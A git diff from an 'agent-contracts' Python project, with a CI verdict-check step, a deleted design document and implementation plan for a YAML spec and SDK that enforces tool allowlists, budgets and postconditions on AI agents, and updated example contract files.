0 ]; then outcome="fail" fi - echo "::endgroup::" done + + if [ -n "${{ inputs.verdict }}" ]; then + echo "::group::Checking verdict ${{ inputs.verdict }}" + extra_flag="" + if [ "${{ inputs.fail-on-warn-outcome }}" = "true" ]; then + extra_flag="--fail-on-warn" + fi + if ! python -m agent_contracts.cli check-verdict "${{ inputs.verdict }}" $extra_flag; then + outcome="fail" + fi + verdict_outcome=$(python -c 'import json,sys; print(json.load(open(sys.argv[1], encoding="utf-8"))["outcome"])' "${{ inputs.verdict }}") + echo "::endgroup::" + fi + + echo "tier=$tier" >> "$GITHUB_OUTPUT" echo "outcome=$outcome" >> "$GITHUB_OUTPUT" + echo "verdict_outcome=$verdict_outcome" >> "$GITHUB_OUTPUT" + if [ "$outcome" = "fail" ]; then exit 1 fi diff --git a/docs/plans/2026-03-25-agent-contracts-v0.1-design.md b/docs/plans/2026-03-25-agent-contracts-v0.1-design.md deleted file mode 100644 index fb3af96..0000000 --- a/docs/plans/2026-03-25-agent-contracts-v0.1-design.md +++ /dev/null @@ -1,361 +0,0 @@ -# Agent Contracts v0.1 — Design Document - -## Metadata -- **Status:** Draft -- **Author:** Piyush Vyas -- **Date:** 2026-03-25 -- **Reviewers:** Claude quality-reviewer, Codex cross-reviewer -- **Complexity Tier:** Complex - ---- - -## Context & Problem Statement - -Production AI agents fail at 41–86.7% rates (MAST taxonomy, 1,642 traces across 7 frameworks). -97% of enterprises with agents in production cannot scale them. The dominant failure modes — -cost runaway, unauthorized tool use, missing audit trails, silent regressions — have no -framework-agnostic solution. - -MCP owns transport. LangChain/CrewAI own orchestration. Datadog/Langfuse own observability. -**No layer governs what an agent may do, must guarantee, and what happens when it fails.** - -Agent Contracts fills this gap: a YAML spec + validation SDK that enforces agent behavior -at the runtime boundary. The OpenAPI model — a machine-readable document that generates -tooling leverage. - -**Why now:** EU AI Act high-risk requirements take effect Aug 2026. HIPAA Security Rule update -makes AI handling ePHI subject to mandatory controls. The standards window closes in 12–18 months. - ---- - -## Goals - -1. **Define a YAML spec** (AGENT_CONTRACT.yaml) with 3 graduated tiers (Standalone → Enforceable → Composable) -2. **Ship a Python SDK** (`agent-contracts`) that validates contracts, enforces budgets/effects at runtime, and emits OTel-compatible violation events -3. **Ship a CLI** for validation, compatibility checking, contract generation from traces, and eval testing -4. **Ship framework adapters** for LangChain, CrewAI, and Pydantic AI (each <200 LOC, 3-line integration) -5. **Draft MCP extension proposal** (`x-agent-contract`) for tool-level contract metadata - -## Non-Goals - -1. **Not a protocol** — MCP owns transport; we layer policy above it -2. **Not a platform** — no hosted service, no vendor lock-in -3. **Not formal verification** — no theorem proving; executable assertions at Levels 2–3 -4. **No custom DSL** — YAML primary, CEL-like expressions for inline checks only -5. **No TypeScript SDK** in v0.1 (deferred to v0.1.x, 4–6 weeks post-launch) -6. **No contract registry** — premature infrastructure at zero adoption -7. **No inter-agent negotiation** — requires ecosystem maturity -8. **No taint tracking** — novel; deferred to v0.2 - ---- - -## Design - -### Option A: Monolithic SDK (Single Package, Everything Built-in) - -**Approach:** Single `agent-contracts` package containing spec schema, loader, validator, -enforcer, CLI, OTel emitter, composition checker, and all framework adapters. - -**Trade-offs:** -- Pro: Single install, single import, simpler dependency management -- Con: Pulls in framework deps (langchain, crewai, pydanticai) even if unused; bloated install - -**Complexity:** ~3000 LOC, 1 package, heavy deps - -### Option B: Modular Core + Optional Extras (Recommended) - -**Approach:** Core package (`agent-contracts`) with zero required framework deps. -Framework adapters as optional extras (`pip install agent-contracts[langchain]`). -CLI bundled in core. OTel as optional extra. - -**Trade-offs:** -- Pro: Minimal install footprint; framework deps only when needed; clean separation of concerns -- Pro: Each module testable independently; easier to maintain -- Con: Slightly more complex packaging (extras_require) - -**Complexity:** ~3500 LOC, 1 package with extras, minimal required deps (pyyaml, jsonschema) - -### Recommendation - -**Option B** — Modular Core + Optional Extras. Matches the plan's "standalone value first" strategy. -A developer gets `pip install agent-contracts` with zero framework baggage. Framework adapters -are opt-in. This mirrors how OpenTelemetry structures its packages. - ---- - -## Detailed Design - -### Package Structure - -``` -agent-contracts/ -├── pyproject.toml # Package config (hatch build system) -├── LICENSE # Apache-2.0 -├── README.md # Getting started, 5-minute contract -├── AGENT_CONTRACT.yaml # Reference example (support triage agent) -├── src/ -│ └── agent_contracts/ -│ ├── __init__.py # Public API surface -│ ├── py.typed # PEP 561 marker -│ ├── types.py # Core data models (dataclasses) -│ ├── schema.py # JSON Schema definitions (all 3 tiers) -│ ├── loader.py # YAML loading + schema validation -│ ├── tier.py # Tier assessment logic -│ ├── enforcer.py # Runtime enforcement (budgets, effects, schemas) -│ ├── effects.py # Effect authorization (default-deny allowlist) -│ ├── budgets.py # Budget tracking (cost, tokens, tool calls, duration) -│ ├── postconditions.py # Postcondition evaluation (sync/async/monitor) -│ ├── violations.py # Violation event creation + OTel emission -│ ├── composition.py # Contract Differential (schema/capability/budget gaps) -│ ├── cli.py # CLI entry point (click-based) -│ ├── init_from_trace.py # Generate contract skeleton from traces -│ ├── _version.py # Version constant -│ └── adapters/ -│ ├── __init__.py -│ ├── langchain.py # LangChain adapter (<200 LOC) -│ ├── crewai.py # CrewAI adapter (<200 LOC) -│ └── pydantic_ai.py # Pydantic AI adapter (<200 LOC) -├── schemas/ -│ └── agent-contract.schema.json # The JSON Schema (machine-readable spec) -├── spec/ -│ └── SPECIFICATION.md # Human-readable spec narrative -├── mcp/ -│ └── x-agent-contract.md # MCP extension proposal -├── examples/ -│ ├── support_triage.yaml # Tier 2 reference example -│ ├── simple_chatbot.yaml # Tier 0 minimal example -│ └── cost_controlled.yaml # Tier 1 budget-focused example -└── tests/ - ├── __init__.py - ├── conftest.py # Shared fixtures - ├── test_loader.py # Contract loading + validation - ├── test_tier.py # Tier assessment - ├── test_enforcer.py # Runtime enforcement - ├── test_effects.py # Effect authorization - ├── test_budgets.py # Budget tracking - ├── test_postconditions.py # Postcondition evaluation - ├── test_violations.py # Violation events - ├── test_composition.py # Contract Differential - ├── test_cli.py # CLI commands - ├── test_init_from_trace.py # Trace-based generation - └── test_adapters/ - ├── test_langchain.py - ├── test_crewai.py - └── test_pydantic_ai.py -``` - -### Core Data Models (`types.py`) - -```python -@dataclass(frozen=True) -class ContractIdentity: - name: str - version: str - -@dataclass(frozen=True) -class PostconditionDef: - name: str - check: str # CEL-like expression or "eval:judge" reference - enforcement: Literal["sync_block", "sync_warn", "async_monitor"] - severity: Literal["critical", "major", "minor"] - slo: SLODef | None = None - -@dataclass(frozen=True) -class EffectsAuthorized: - tools: list[str] # Allowlist (default: deny all) - network: list[str] # URL patterns - state_writes: list[str] # State scope patterns - -@dataclass(frozen=True) -class EffectsDeclared: - tools: list[str] # Actual effect footprint - network: list[str] - state_writes: list[str] - -@dataclass(frozen=True) -class ResourceBudgets: - max_cost_usd: float | None - max_tokens: int | None - max_tool_calls: int | None - max_duration_seconds: float | None - -@dataclass(frozen=True) -class Contract: - spec_version: str - identity: ContractIdentity - postconditions: list[PostconditionDef] - tier: int # Computed: 0, 1, or 2 - # Tier 1 - input_schema: dict | None - output_schema: dict | None - effects_authorized: EffectsAuthorized | None - budgets: ResourceBudgets | None - # Tier 2 - failure_model: dict | None - effects_declared: EffectsDeclared | None - delegation: DelegationRules | None - observability: ObservabilityConfig | None - versioning: VersioningConfig | None - slo: SLOConfig | None -``` - -### Enforcement Flow (`enforcer.py`) - -``` -Agent invocation - │ - ├─ PRE: validate input against input_schema (Tier 1) - │ - ├─ DURING: intercept each tool call - │ ├─ Check tool name against effects.authorized.tools (default: DENY) - │ ├─ Increment tool_call counter → check against max_tool_calls - │ ├─ Accumulate cost → check against max_cost_usd - │ ├─ Check elapsed time → check against max_duration_seconds - │ └─ On violation → emit OTel event, circuit-break or warn - │ - ├─ POST: validate output against output_schema (Tier 1) - │ ├─ Evaluate sync_block postconditions → block if failed - │ ├─ Evaluate sync_warn postconditions → warn if failed - │ └─ Queue async_monitor postconditions → evaluate async - │ - └─ EMIT: violation events (OTel-compatible) -``` - -Three usage patterns: -1. **Decorator:** `@enforce_contract("path/to/contract.yaml")` -2. **Context Manager:** `with ContractEnforcer(contract) as enforcer:` -3. **Explicit API:** `enforcer.check_tool_call(name, args)`, `enforcer.validate_output(data)` - -### Effect Authorization (`effects.py`) - -- **Default-deny:** If `effects.authorized.tools` is defined, only listed tools are allowed -- **Pattern matching:** Supports glob patterns (`database.*`, `api.user.*`) -- **Composition:** During delegation, authorized effects compose via **intersection** (capabilities attenuate) -- **Audit:** Declared effects compose via **union** (footprint accumulates) -- Runtime enforces: `declared ⊆ authorized` - -### Budget Enforcement (`budgets.py`) - -- Per-invocation counters: cost, tokens, tool_calls, elapsed time -- Thread-safe (uses threading.Lock for counter updates) -- Circuit breaker: when threshold hit, raises `BudgetExceededError` -- Cost tracking: accepts cost callbacks from the caller (we don't hardcode model prices) - -### Violation Events (`violations.py`) - -OTel-compatible structured events: -```python -@dataclass -class ViolationEvent: - contract_id: str - contract_version: str - violated_clause: str # e.g., "budgets.max_cost_usd" - evidence: dict # e.g., {"actual": 5.23, "limit": 5.00} - severity: str # "critical", "major", "minor" - enforcement: str # "blocked", "warned", "monitored" - trace_id: str | None - span_id: str | None - timestamp: str # ISO 8601 -``` - -Emitters: stdout (default), OTel SDK (when `opentelemetry-api` installed), callback. - -### Composition Checker (`composition.py`) - -Contract Differential between two Tier 2 contracts: -- **Schema gaps:** Input schema A not assignable to output schema B -- **Capability gaps:** A requires tools not authorized by B -- **Budget gaps:** A's budget exceeds B's budget -- **Effect validation:** A's declared effects not ⊆ B's authorized effects -- Returns structured report with compatibility verdict - -### CLI (`cli.py`) - -Built on `click`. Four commands: -- `validate`: Load contract, validate schema, report tier, recommend missing fields -- `check-compat`: Run composition checker between two contracts -- `init`: Generate contract skeleton from execution trace JSONL -- `test`: Run eval suite against contract postconditions - ---- - -## Security & Privacy Considerations - -- [x] **Default-deny effects** — tools not in allowlist are blocked before execution -- [x] **No prompt-level enforcement** — all enforcement at SDK layer (not bypassable via injection) -- [x] **Budget circuit breakers** — prevent cost runaway architecturally -- [x] **No secrets in contracts** — contracts are declarative policy, no credentials -- [x] **Input validation** — all YAML input validated against JSON Schema before processing -- [x] **No eval()** — CEL-like expressions parsed by a safe evaluator, never `eval()` -- [x] **Thread-safe counters** — budget enforcement is concurrency-safe -- [x] **Immutable data models** — `frozen=True` dataclasses prevent mutation after construction - ---- - -## Testing Strategy - -### Unit Tests -- Loader: valid/invalid YAML, schema validation errors, partial contracts -- Tier: correct tier classification for all combinations of fields -- Enforcer: tool call interception, budget tracking, input/output validation -- Effects: allowlist matching, glob patterns, default-deny, composition (intersection/union) -- Budgets: counter increments, threshold detection, thread safety -- Postconditions: sync_block/sync_warn/async_monitor evaluation -- Violations: event creation, OTel formatting, callback emission -- Composition: schema compatibility, capability gaps, budget gaps - -### Integration Tests -- Full enforcement flow: load contract → enforce agent invocation → collect violations -- CLI commands: validate, check-compat, init from sample traces -- Framework adapters: integration with mocked LangChain/CrewAI/Pydantic AI hooks - -### Test Coverage Target -- 90%+ line coverage on core modules (loader, enforcer, effects, budgets) -- 80%+ on adapters and CLI - ---- - -## Monitoring & Observability - -- **Built-in:** Violation events are the core observability primitive -- **OTel integration:** Events conform to OpenTelemetry semantic conventions -- **Metrics:** contract_satisfaction_rate, budget_utilization, effect_violations_total -- N/A for self-monitoring — this is the monitoring SDK, not a monitored service - ---- - -## Rollback Plan - -- [x] Change is revertable with `git revert` (all commits on feature branch) -- [x] No data migrations -- [x] Not applicable (new repo, no production deployment) -- [x] Rollback: `pip uninstall agent-contracts` - ---- - -## Dependencies & Risks - -### Required Dependencies (minimal) -- `pyyaml>=6.0` — YAML parsing -- `jsonschema>=4.20` — JSON Schema validation -- `click>=8.0` — CLI framework - -### Optional Dependencies -- `opentelemetry-api>=1.20` — OTel event emission -- `langchain-core>=0.2` — LangChain adapter -- `crewai>=0.50` — CrewAI adapter -- `pydantic-ai>=0.1` — Pydantic AI adapter - -### Risks -- **Adoption stalls at Tier 0** (medium) — mitigated by CLI nudges toward Tier 1 -- **CEL expression parser complexity** — mitigated by starting with simple comparisons only -- **Framework adapter API changes** — mitigated by pinning minimum versions, thin wrappers - ---- - -## Approval - -- [ ] Design reviewed by quality reviewer -- [ ] Design reviewed by cross-reviewer (DADS, Complex tier) -- [ ] Security considerations reviewed -- [ ] Testing strategy adequate for risk level diff --git a/docs/plans/2026-03-25-agent-contracts-v0.1-plan.md b/docs/plans/2026-03-25-agent-contracts-v0.1-plan.md deleted file mode 100644 index 8617d75..0000000 --- a/docs/plans/2026-03-25-agent-contracts-v0.1-plan.md +++ /dev/null @@ -1,165 +0,0 @@ -# Agent Contracts v0.1 — Implementation Plan - -## Goal -Build the Agent Contracts v0.1 project: YAML spec + Python SDK + CLI + framework adapters + MCP extension proposal. - -## Approach -Sequential implementation starting with the spec/schema foundation, then core SDK modules (bottom-up by dependency), CLI, adapters, and finally documentation/examples. Each task is independently committable and revertable. - -## File Inventory - -| File | Action | Task | -|------|--------|------| -| `pyproject.toml` | CREATE | T1 | -| `LICENSE` | CREATE | T1 | -| `src/agent_contracts/__init__.py` | CREATE | T1 | -| `src/agent_contracts/py.typed` | CREATE | T1 | -| `src/agent_contracts/_version.py` | CREATE | T1 | -| `schemas/agent-contract.schema.json` | CREATE | T2 | -| `src/agent_contracts/types.py` | CREATE | T3 | -| `src/agent_contracts/schema.py` | CREATE | T3 | -| `src/agent_contracts/loader.py` | CREATE | T4 | -| `src/agent_contracts/tier.py` | CREATE | T4 | -| `src/agent_contracts/effects.py` | CREATE | T5 | -| `src/agent_contracts/budgets.py` | CREATE | T5 | -| `src/agent_contracts/postconditions.py` | CREATE | T6 | -| `src/agent_contracts/violations.py` | CREATE | T6 | -| `src/agent_contracts/enforcer.py` | CREATE | T7 | -| `src/agent_contracts/composition.py` | CREATE | T8 | -| `src/agent_contracts/init_from_trace.py` | CREATE | T9 | -| `src/agent_contracts/cli.py` | CREATE | T9 | -| `src/agent_contracts/adapters/__init__.py` | CREATE | T10 | -| `src/agent_contracts/adapters/langchain.py` | CREATE | T10 | -| `src/agent_contracts/adapters/crewai.py` | CREATE | T10 | -| `src/agent_contracts/adapters/pydantic_ai.py` | CREATE | T10 | -| `examples/support_triage.yaml` | CREATE | T11 | -| `examples/simple_chatbot.yaml` | CREATE | T11 | -| `examples/cost_controlled.yaml` | CREATE | T11 | -| `AGENT_CONTRACT.yaml` | CREATE | T11 | -| `spec/SPECIFICATION.md` | CREATE | T12 | -| `mcp/x-agent-contract.md` | CREATE | T12 | -| `tests/conftest.py` | CREATE | T4 | -| `tests/test_loader.py` | CREATE | T4 | -| `tests/test_tier.py` | CREATE | T4 | -| `tests/test_effects.py` | CREATE | T5 | -| `tests/test_budgets.py` | CREATE | T5 | -| `tests/test_postconditions.py` | CREATE | T6 | -| `tests/test_violations.py` | CREATE | T6 | -| `tests/test_enforcer.py` | CREATE | T7 | -| `tests/test_composition.py` | CREATE | T8 | -| `tests/test_cli.py` | CREATE | T9 | -| `tests/test_init_from_trace.py` | CREATE | T9 | -| `tests/test_adapters/test_langchain.py` | CREATE | T10 | -| `tests/test_adapters/test_crewai.py` | CREATE | T10 | -| `tests/test_adapters/test_pydantic_ai.py` | CREATE | T10 | -| `README.md` | MODIFY | T13 | -| `.gitignore` | CREATE | T1 | -| `CLAUDE.md` | CREATE | T13 | - ---- - -## Tasks - -### T1: Project scaffolding and package configuration -- **What:** Create pyproject.toml (hatch build), LICENSE (Apache-2.0), .gitignore, package __init__.py, py.typed marker, _version.py -- **Files:** pyproject.toml, LICENSE, .gitignore, src/agent_contracts/__init__.py, src/agent_contracts/py.typed, src/agent_contracts/_version.py -- **LOC estimate:** ~120 -- **Verify:** `cd /Users/piyush/GitHub/agent-contracts && python -m pip install -e ".[dev]" && python -c "import agent_contracts; print(agent_contracts.__version__)"` -- **Commit:** `build(project): scaffold package with pyproject.toml and Apache-2.0 license` -- **Rollback:** `git revert ` - -### T2: JSON Schema for AGENT_CONTRACT.yaml (all 3 tiers) -- **What:** Create the formal JSON Schema that defines the AGENT_CONTRACT.yaml format. Covers Tier 0 (identity + postconditions), Tier 1 (+ schemas, effects.authorized, budgets), Tier 2 (+ failure_model, effects.declared, delegation, observability, versioning, slo). Supports x- extensions and must-ignore unknown fields. -- **Files:** schemas/agent-contract.schema.json -- **LOC estimate:** ~280 -- **Verify:** `python -c "import json; s=json.load(open('schemas/agent-contract.schema.json')); print(s['title'])"` -- **Commit:** `feat(spec): add JSON Schema for AGENT_CONTRACT.yaml covering all 3 tiers` -- **Rollback:** `git revert ` - -### T3: Core data models and schema module -- **What:** Define frozen dataclasses for Contract, ContractIdentity, PostconditionDef, EffectsAuthorized, EffectsDeclared, ResourceBudgets, DelegationRules, ObservabilityConfig, VersioningConfig, SLOConfig, SLODef. Schema module loads and exposes the JSON Schema. -- **Files:** src/agent_contracts/types.py, src/agent_contracts/schema.py -- **LOC estimate:** ~250 -- **Verify:** `python -c "from agent_contracts.types import Contract, ResourceBudgets; print('OK')"` -- **Commit:** `feat(core): add typed data models and schema module` -- **Rollback:** `git revert ` - -### T4: Contract loader, tier assessor, and tests -- **What:** YAML loading with schema validation, tier assessment (classify as 0/1/2 based on fields present), recommendation engine for missing fields. Shared test fixtures. Tests for loader and tier. -- **Files:** src/agent_contracts/loader.py, src/agent_contracts/tier.py, tests/conftest.py, tests/test_loader.py, tests/test_tier.py -- **LOC estimate:** ~300 -- **Verify:** `cd /Users/piyush/GitHub/agent-contracts && python -m pytest tests/test_loader.py tests/test_tier.py -v` -- **Commit:** `feat(core): add contract loader with schema validation and tier assessment` -- **Rollback:** `git revert ` - -### T5: Effect authorization and budget enforcement with tests -- **What:** Default-deny effect gating with glob pattern matching. Budget tracker with thread-safe counters, circuit breaker on threshold. Tests for both. -- **Files:** src/agent_contracts/effects.py, src/agent_contracts/budgets.py, tests/test_effects.py, tests/test_budgets.py -- **LOC estimate:** ~280 -- **Verify:** `python -m pytest tests/test_effects.py tests/test_budgets.py -v` -- **Commit:** `feat(core): add effect authorization (default-deny) and budget enforcement` -- **Rollback:** `git revert ` - -### T6: Postcondition evaluation and violation events with tests -- **What:** Postcondition evaluator supporting sync_block/sync_warn/async_monitor enforcement timing. Safe expression evaluator for CEL-like checks (no eval()). Violation event model (OTel-compatible). Event emitters: stdout, callback, optional OTel SDK. Tests. -- **Files:** src/agent_contracts/postconditions.py, src/agent_contracts/violations.py, tests/test_postconditions.py, tests/test_violations.py -- **LOC estimate:** ~280 -- **Verify:** `python -m pytest tests/test_postconditions.py tests/test_violations.py -v` -- **Commit:** `feat(core): add postcondition evaluation and OTel-compatible violation events` -- **Rollback:** `git revert ` - -### T7: Runtime enforcer (middleware) with tests -- **What:** ContractEnforcer class that wires together effects, budgets, postconditions, and violations into a unified enforcement flow. Supports decorator, context manager, and explicit API. Pre-call input validation, per-tool-call interception, post-call output validation. -- **Files:** src/agent_contracts/enforcer.py, tests/test_enforcer.py -- **LOC estimate:** ~250 -- **Verify:** `python -m pytest tests/test_enforcer.py -v` -- **Commit:** `feat(core): add runtime enforcer with decorator, context manager, and explicit API` -- **Rollback:** `git revert ` - -### T8: Composition checker (Contract Differential) with tests -- **What:** Given two Tier 2 contracts, compute schema gaps, capability gaps, budget gaps, effect validation (declared ⊆ authorized). Returns structured compatibility report. -- **Files:** src/agent_contracts/composition.py, tests/test_composition.py -- **LOC estimate:** ~200 -- **Verify:** `python -m pytest tests/test_composition.py -v` -- **Commit:** `feat(core): add composition checker with Contract Differential analysis` -- **Rollback:** `git revert ` - -### T9: CLI tool and trace-based init with tests -- **What:** Click-based CLI with 4 commands: validate, check-compat, init (from-trace), test. Trace parser reads JSONL execution traces and generates contract skeleton. Tests. -- **Files:** src/agent_contracts/cli.py, src/agent_contracts/init_from_trace.py, tests/test_cli.py, tests/test_init_from_trace.py -- **LOC estimate:** ~300 -- **Verify:** `cd /Users/piyush/GitHub/agent-contracts && python -m agent_contracts.cli validate examples/support_triage.yaml` (after T11) -- **Commit:** `feat(cli): add validate, check-compat, init, and test commands` -- **Rollback:** `git revert ` - -### T10: Framework adapters (LangChain, CrewAI, Pydantic AI) with tests -- **What:** Thin adapter wrappers (<200 LOC each) that map framework-specific hooks to the SDK's enforcement API. Each adapter enables 3-line contract enforcement integration. Tests with mocked framework interfaces. -- **Files:** src/agent_contracts/adapters/__init__.py, src/agent_contracts/adapters/langchain.py, src/agent_contracts/adapters/crewai.py, src/agent_contracts/adapters/pydantic_ai.py, tests/test_adapters/test_langchain.py, tests/test_adapters/test_crewai.py, tests/test_adapters/test_pydantic_ai.py -- **LOC estimate:** ~300 (adapters) + ~200 (tests) -- **Verify:** `python -m pytest tests/test_adapters/ -v` -- **Commit:** `feat(adapters): add LangChain, CrewAI, and Pydantic AI framework adapters` -- **Rollback:** `git revert ` - -### T11: Reference examples and root contract -- **What:** Create example AGENT_CONTRACT.yaml files: support_triage (Tier 2, full), simple_chatbot (Tier 0, minimal), cost_controlled (Tier 1, budget-focused). Root AGENT_CONTRACT.yaml as the canonical reference. All must pass schema validation. -- **Files:** AGENT_CONTRACT.yaml, examples/support_triage.yaml, examples/simple_chatbot.yaml, examples/cost_controlled.yaml -- **LOC estimate:** ~200 -- **Verify:** `python -m agent_contracts.cli validate AGENT_CONTRACT.yaml && python -m agent_contracts.cli validate examples/support_triage.yaml` -- **Commit:** `docs(examples): add reference AGENT_CONTRACT.yaml files for all 3 tiers` -- **Rollback:** `git revert ` - -### T12: Specification narrative and MCP extension proposal -- **What:** Human-readable spec document explaining each field, the tier system, breaking change rules, and CEL expression syntax. MCP extension proposal for x-agent-contract on tool definitions. -- **Files:** spec/SPECIFICATION.md, mcp/x-agent-contract.md -- **LOC estimate:** ~250 -- **Verify:** Manual review — documents should be complete and accurate -- **Commit:** `docs(spec): add human-readable specification and MCP extension proposal` -- **Rollback:** `git revert ` - -### T13: README, CLAUDE.md, and public API surface -- **What:** Getting-started README with 5-minute contract experience, quick examples, API reference. CLAUDE.md for repo conventions. Polish __init__.py public exports. -- **Files:** README.md, CLAUDE.md, src/agent_contracts/__init__.py -- **LOC estimate:** ~200 -- **Verify:** `python -c "from agent_contracts import Contract, ContractEnforcer, load_contract, validate_contract; print('Public API OK')"` -- **Commit:** `docs(readme): add getting-started guide and CLAUDE.md conventions` -- **Rollback:** `git revert ` diff --git a/examples/cost_controlled.yaml b/examples/cost_controlled.yaml index 65b1868..7fc438a 100644 --- a/examples/cost_controlled.yaml +++ b/examples/cost_controlled.yaml @@ -1,13 +1,12 @@ # Tier 1 — Enforceable Contract -# Adds cost control, tool-use security, and input/output validation. -# The SDK can enforce these at the boundary. +# Adds cost control plus coding/build shell and file scopes. agent_contract: "0.1.0" identity: name: cost-controlled-researcher - version: "1.2.0" - description: A research agent with strict cost and tool-use controls. + version: "0.1.0" + description: Research helper with strict spend and execution controls. contract: postconditions: @@ -20,21 +19,15 @@ contract: check: "len(output.sources) > 0" enforcement: sync_warn severity: major - description: Research output should include at least one source. inputs: schema: type: object - required: - - query + required: [query] properties: query: type: string minLength: 1 - max_results: - type: integer - minimum: 1 - maximum: 50 outputs: schema: @@ -46,25 +39,22 @@ outputs: type: array items: type: string - confidence: - type: number - minimum: 0 - maximum: 1 effects: authorized: - tools: - - web_search - - document_reader - - summarizer - network: - - "https://api.search-provider.com/*" - - "https://docs.example.com/*" + tools: [web_search, document_reader, summarizer] + network: ["https://api.search-provider.com/*", "https://docs.example.com/*"] state_writes: [] + filesystem: + read: ["docs/**", "README.md"] + write: ["notes/**"] + shell: + commands: ["python -m pytest *"] resources: budgets: max_cost_usd: 0.50 max_tokens: 15000 max_tool_calls: 10 + max_shell_commands: 2 max_duration_seconds: 60.0 diff --git a/examples/demo_blocked_command.yaml b/examples/demo_blocked_command.yaml new file mode 100644 index 0000000..9a3025a --- /dev/null +++ b/examples/demo_blocked_command.yaml @@ -0,0 +1,29 @@ +agent_contract: "0.1.0" + +identity: + name: blocked-command-demo + version: "0.1.0" + +contract: + postconditions: + - name: produces_output + check: "output is not None" + enforcement: sync_block + severity: critical + +effects: + authorized: + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + tools: [] + network: [] + state_writes: [] + +resources: + budgets: + max_shell_commands: 3 + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/demo_blocked_file_write.yaml b/examples/demo_blocked_file_write.yaml new file mode 100644 index 0000000..285f5c2 --- /dev/null +++ b/examples/demo_blocked_file_write.yaml @@ -0,0 +1,24 @@ +agent_contract: "0.1.0" + +identity: + name: blocked-file-write-demo + version: "0.1.0" + +contract: + postconditions: + - name: produces_output + check: "output is not None" + enforcement: sync_block + severity: critical + +effects: + authorized: + filesystem: + read: ["src/**", "tests/**"] + write: ["src/**"] + tools: [] + network: [] + state_writes: [] + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/demo_failed_checks.yaml b/examples/demo_failed_checks.yaml new file mode 100644 index 0000000..350fee9 --- /dev/null +++ b/examples/demo_failed_checks.yaml @@ -0,0 +1,15 @@ +agent_contract: "0.1.0" + +identity: + name: failed-checks-demo + version: "0.1.0" + +contract: + postconditions: + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/repo_build_agent.yaml b/examples/repo_build_agent.yaml new file mode 100644 index 0000000..9f33554 --- /dev/null +++ b/examples/repo_build_agent.yaml @@ -0,0 +1,41 @@ +agent_contract: "0.1.0" + +identity: + name: repo-build-agent + version: "0.1.0" + description: Repo-local coding/build agent with bounded file and shell scope. + +contract: + postconditions: + - name: produces_output + check: "output is not None" + enforcement: sync_block + severity: critical + + - name: repo_checks_green + check: "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0" + enforcement: sync_block + severity: critical + +effects: + authorized: + filesystem: + read: ["src/**", "tests/**", "README.md", "pyproject.toml"] + write: ["src/**", "tests/**", "README.md"] + shell: + commands: + - "python -m pytest *" + - "python -m ruff check *" + tools: [] + network: [] + state_writes: [] + +resources: + budgets: + max_tokens: 50000 + max_tool_calls: 20 + max_shell_commands: 10 + max_duration_seconds: 1800 + +observability: + run_artifact_path: ".agent-contracts/runs/{run_id}/verdict.json" diff --git a/examples/simple_chatbot.yaml b/examples/simple_chatbot.yaml index ee46077..ed114d2 100644 --- a/examples/simple_chatbot.yaml +++ b/examples/simple_chatbot.yaml @@ -1,13 +1,11 @@ # Tier 0 — Minimal Valid Contract -# A developer gets value from writing this even if nothing else reads it. -# 4 fields. Adopt in 5 minutes. No runtime required. agent_contract: "0.1.0" identity: name: simple-chatbot - version: "1.0.0" - description: A basic conversational chatbot with a single quality guarantee. + version: "0.1.0" + description: Basic chatbot with one non-null response guarantee. contract: postconditions: @@ -15,4 +13,3 @@ contract: check: "output is not None" enforcement: sync_block severity: critical - description: The chatbot must always produce a non-null response. diff --git a/examples/support_triage.yaml b/examples/support_triage.yaml index 7ba7fdd..56597a7 100644 --- a/examples/support_triage.yaml +++ b/examples/support_triage.yaml @@ -1,16 +1,11 @@ -# Tier 2 — Composable Contract (Full Reference Example) -# Supports multi-agent DAG composition, canary analysis, rollback, -# and regulatory audit trails. +# Tier 2 — Composable Contract (retained broader example) agent_contract: "0.1.0" identity: name: support-triage-agent - version: "2.1.0" - description: > - Triages incoming support tickets by analyzing content, classifying - priority, and routing to the appropriate team. Handles 500+ tickets/day - with 99.5% contract satisfaction. + version: "0.1.0" + description: Triages incoming support tickets with explicit safety and audit hooks. authors: - Piyush Vyas @@ -20,39 +15,24 @@ contract: check: "output is not None" enforcement: sync_block severity: critical - description: Must always produce a triage result. - name: valid_priority check: 'output.priority in ["critical", "high", "medium", "low"]' enforcement: sync_block severity: critical - description: Priority must be one of the defined levels. - name: has_routing check: 'output.routed_to is not None' enforcement: sync_warn severity: major - description: Should route to a team (warn if not). slo: target_rate: 0.99 window: "24h" - - name: response_quality - check: "eval:quality_judge" - enforcement: async_monitor - severity: minor - description: LLM-as-judge quality assessment (async, not blocking). - slo: - target_rate: 0.95 - window: "7d" - inputs: schema: type: object - required: - - ticket_id - - subject - - body + required: [ticket_id, subject, body] properties: ticket_id: type: string @@ -60,31 +40,22 @@ inputs: type: string body: type: string - customer_tier: - type: string - enum: ["enterprise", "business", "starter", "free"] - attachments: - type: array - items: - type: object - properties: - filename: - type: string - url: - type: string preconditions: - name: ticket_not_empty check: "len(input.body) > 0" - description: Ticket body must not be empty. outputs: schema: type: object - required: - - priority - - category + required: [priority, category] properties: + ticket_id: + type: string + subject: + type: string + body: + type: string priority: type: string enum: ["critical", "high", "medium", "low"] @@ -92,14 +63,6 @@ outputs: type: string routed_to: type: string - summary: - type: string - suggested_response: - type: string - confidence: - type: number - minimum: 0 - maximum: 1 effects: authorized: @@ -109,7 +72,6 @@ effects: - ticket_database.assign - customer_lookup - knowledge_base.search - - notification.send_team network: - "https://api.ticketing.internal/*" - "https://api.customers.internal/*" @@ -143,77 +105,15 @@ failure_model: errors: - name: ticket_not_found retryable: false - description: The referenced ticket does not exist. - - name: database_timeout retryable: true max_retries: 3 - description: Ticket database took too long to respond. - - - name: rate_limit - retryable: true - max_retries: 2 - fallback: queue-agent - description: API rate limit exceeded, queue for later processing. - - - name: classification_uncertain - retryable: false - fallback: human-review-queue - description: Agent confidence too low for automated triage. - - default_timeout_seconds: 20.0 - - circuit_breaker: - failure_threshold: 10 - reset_timeout_seconds: 120.0 - -delegation: - max_depth: 2 - attenuate_effects: true - require_contract: true - allowed_agents: - - queue-agent - - human-review-queue - - 